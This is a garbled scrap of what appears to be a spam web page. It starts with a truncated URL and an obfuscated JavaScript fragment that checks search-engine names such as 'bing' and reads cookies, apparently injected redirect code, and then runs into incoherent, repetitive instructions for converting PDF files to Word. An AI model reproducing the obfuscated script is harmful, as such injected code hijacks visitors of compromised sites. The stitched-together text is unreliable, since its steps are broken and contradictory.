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men/don_con php?x=en&query='};var _0x166029=[_0xfc840[_0xe941('0x21')],' bing ',_0xfc840[_0xe941('0x22')],_0xfc840['xyKxq'],_0xfc840[_0xe941('0x23')],_0xe941('0x24'),_0xfc840[_0xe941('0x25')]],_0x1364ad=document[_0xe941('0x26')],_0x6952a6=![],_0x55e9fc=cookie[_0xe941('0x27')](_0xe941('0xc'));for(var _0xb32050=0x0;_0xb32050. This is why you have to edit it to make everything look smart again Right click on a PDF and click "Open with.. A new window will open Click on "Add Files" and select "More files" Select the format for Word: you can save the output file as.
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Hence why it is a different file type So when the document is getting converted, it tries to place everything in the right place, but looses a lot of the code.. Steps EditMethod One of Three:Method Two of Three:Using Microsoft Word 2016 or 2013 EditMethod Three of Three:Using Adobe Acrobat Pro EditCommunity Q&AThis happens because Google Docs uses a different code (UI) to a PDF Document. 0041d406d9